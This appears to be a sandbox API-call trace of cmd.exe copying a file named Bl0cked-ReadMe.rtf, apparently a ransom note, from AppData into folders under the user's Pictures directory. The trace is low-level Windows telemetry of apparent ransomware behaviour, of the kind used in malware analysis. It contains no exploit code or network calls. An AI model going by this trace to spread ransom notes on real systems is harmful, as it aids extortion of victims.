SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.702] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.702] GetEnvironmentStringsW () returned 0x102b18* [0143.702] FreeEnvironmentStringsW (penv=0x102b18) returned 1 [0143.702] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0143.702] GetConsoleOutputCP () returned 0x1b5 [0143.703] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.703] GetUserDefaultLCID () returned 0x409 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efd78, cchData=128 | out: lpLCData="0") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efd78, cchData=128 | out: lpLCData="0") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efd78, cchData=128 | out: lpLCData="1") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.704] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.704] setlocale (category=0, locale=".OCP") returned="English_United States.437" 
[0143.705] GetConsoleTitleW (in: lpConsoleTitle=0xf08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.705] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.705] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.705] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.706] _wcsicmp (_String1="type", _String2=")") returned 75 [0143.706] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0143.706] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0143.706] _wcsicmp (_String1="IF", _String2="type") returned -11 [0143.706] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0143.706] _wcsicmp (_String1="REM", _String2="type") returned -2 [0143.706] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0143.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.711] GetFileType (hFile=0x7) returned 0x2 [0143.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2efc70 | out: lpMode=0x2efc70) returned 1 [0143.900] _dup (_FileHandle=1) returned 3 [0143.900] _close (_FileHandle=1) returned 0 [0143.901] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0143.901] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2efc40, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0143.902] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 
1 [0143.902] GetConsoleTitleW (in: lpConsoleTitle=0x2efa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.902] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0143.902] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0143.902] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0143.902] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0143.903] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.903] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ef5d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef5d4) returned 0xf0ea0 [0143.903] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0143.903] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0143.903] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0143.903] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee4e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0143.904] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0143.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.904] GetFileType (hFile=0x54) returned 0x1 [0143.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.904] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ee538 | out: lpFileSizeHigh=0x2ee538*=0x0) returned 0x1632 [0143.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.904] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 
0x0 [0143.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.904] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.904] GetFileType (hFile=0x4c) returned 0x1 [0143.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.904] GetFileType (hFile=0x4c) returned 0x1 [0143.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.905] GetFileType (hFile=0x4c) returned 0x1 [0143.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.905] GetFileType (hFile=0x4c) returned 0x1 [0143.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) 
returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.906] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.906] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, 
lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.907] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.907] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.908] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.908] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, 
lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.909] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.910] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.910] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.911] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c 
